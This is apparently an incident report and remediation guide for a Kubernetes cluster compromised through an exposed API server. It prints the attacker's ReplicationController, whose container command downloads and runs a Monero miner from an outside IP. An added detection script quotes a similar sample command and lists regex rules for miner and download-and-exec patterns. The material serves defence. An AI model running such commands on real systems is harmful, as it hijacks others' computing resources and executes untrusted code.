Alibaba Cloud Kubernetes cluster compromised by the minerd cryptominer
# kubectl get rc mysql1 -o yaml
apiVersion: v1
kind: ReplicationController
metadata:
  creationTimestamp: 2017-09-07T07:21:43Z
  generation: 1
  labels:
    app: mysql1
  name: mysql1
  namespace: default
  resourceVersion: "12180788"
  selfLink: /api/v1/namespaces/default/replicationcontrollers/mysql1
  uid: 33118df0-939d-11e7-bd2a-00163e088d17
spec:
  replicas: 5
  selector:
    app: mysql1
  template:
    metadata:
      creationTimestamp: null
      labels:
        app: mysql1
    spec:
      containers:
      - command:
        - sh
        - -c
        - curl -L http://172.104.190.64:8220/minerd -o minerd;chmod 777 minerd && setsid ./minerd -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x
        image: centos
        imagePullPolicy: Always
        name: mysql1
        resources: {}
        terminationMessagePath: /dev/termination-log
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      securityContext: {}
      terminationGracePeriodSeconds: 30
      volumes:
      - emptyDir: {}
        name: shared-data
status:
  availableReplicas: 4
  fullyLabeledReplicas: 5
  observedGeneration: 1
  readyReplicas: 4
  replicas: 5
The cause was an insecurely configured Kubernetes API server. The apiserver is the single entry point for all resource operations and is where authentication, authorization, access control, API registration and discovery take place, so its security is critical.
Remediation steps
1. Delete the malicious rc with the following command
kubectl delete rc mysql1
2. Restrict the insecure port 8080 to local access only
# vi /etc/kubernetes/apiserver
KUBE_API_ADDRESS="--insecure-bind-address=127.0.0.1"
3. Serve the secure port 6443 with mutual TLS authentication and authorization-mode=ABAC; for generating the server and client certificates, see the references below
/etc/kubernetes/apiserver configuration
KUBE_API_ARGS="--client-ca-file=/etc/kubernetes/ca.crt --tls-cert-file=/etc/kubernetes/server.crt --tls-private-key-file=/etc/kubernetes/server.key --authorization-mode=ABAC --authorization-policy-file=/etc/kubernetes/authorizationpolicy.txt --enable-swagger-ui=true"
authorizationpolicy.txt authorization policy
{"user":"kubeadmin","readonly": false}
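As an added example (not part of the original post), the following script automates two of the checks a defender would run after this incident: it scans `kubectl get rc -o json` output for containers whose start-up command downloads and executes a binary or contacts a mining pool, and it checks whether the apiserver config still binds the insecure port to a non-loopback address. The controller list and the `203.0.113.10` / `pool.invalid` values are constructed sample data, not the page's real indicators; the rule set is an assumption chosen to match the pattern seen in the compromised rc.

```python
import json
import re

# Constructed sample of `kubectl get rc -o json` output (not the page's real cluster dump):
# a benign controller plus one whose container downloads and runs a binary at start-up.
SAMPLE_RC_LIST = json.dumps({"apiVersion": "v1", "kind": "List", "items": [
    {"kind": "ReplicationController", "metadata": {"name": "web", "namespace": "default"},
     "spec": {"template": {"spec": {"containers": [
         {"name": "web", "image": "nginx:1.13", "command": ["nginx", "-g", "daemon off;"]}]}}}},
    {"kind": "ReplicationController", "metadata": {"name": "mysql1", "namespace": "default"},
     "spec": {"template": {"spec": {"containers": [
         {"name": "mysql1", "image": "centos", "command": ["sh", "-c",
          "curl -L http://203.0.113.10:8220/minerd -o minerd;chmod 777 minerd && "
          "setsid ./minerd -a cryptonight -o stratum+tcp://pool.invalid:3333 -u WALLET -p x"]}]}}}},
]})

# (label, regex) pairs; any hit on a container's command line flags the controller.
RULES = [
    ("download-then-exec", re.compile(r"\b(curl|wget)\b.*?(?<!\S)-[oO]\b.*?[;&|].*?(chmod|\./)")),
    ("stratum-pool", re.compile(r"stratum\+tcp://")),
    ("miner-binary", re.compile(r"\b(minerd|xmrig|cryptonight)\b")),
    ("world-writable-chmod", re.compile(r"chmod\s+777\b")),
]

def container_cmdline(container):
    """Join command and args as the container runtime would pass them."""
    return " ".join(list(container.get("command", [])) + list(container.get("args", [])))

def find_suspicious_controllers(rc_list_json):
    """Return [(namespace, name, container, [rule labels])] for every matching container."""
    findings = []
    for item in json.loads(rc_list_json).get("items", []):
        meta = item.get("metadata", {})
        pod_spec = item.get("spec", {}).get("template", {}).get("spec", {})
        for c in pod_spec.get("containers", []) + pod_spec.get("initContainers", []):
            hits = [label for label, rx in RULES if rx.search(container_cmdline(c))]
            if hits:
                findings.append((meta.get("namespace", "default"), meta.get("name"), c.get("name"), hits))
    return findings

def insecure_port_exposed(apiserver_conf):
    """True if /etc/kubernetes/apiserver explicitly binds the insecure port to a non-loopback
    address; an absent flag falls back to kube-apiserver's default of 127.0.0.1."""
    m = re.search(r"--insecure-bind-address=([\w.:]+)", apiserver_conf)
    return m is not None and m.group(1) not in ("127.0.0.1", "localhost")

if __name__ == "__main__":
    for ns, name, cname, hits in find_suspicious_controllers(SAMPLE_RC_LIST):
        print(f"{ns}/{name} container={cname}: {', '.join(hits)}")
    print("insecure port exposed:", insecure_port_exposed('KUBE_API_ADDRESS="--insecure-bind-address=0.0.0.0"'))
```

On a live cluster, feed `kubectl get rc,deploy,ds,job --all-namespaces -o json` into `find_suspicious_controllers` and review every hit before deleting anything.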
References
https://www.kubernetes.org.cn/1995.html
https://www.kubernetes.org.cn/1865.html
https://kubernetes.io/docs/admin/authentication/#appendix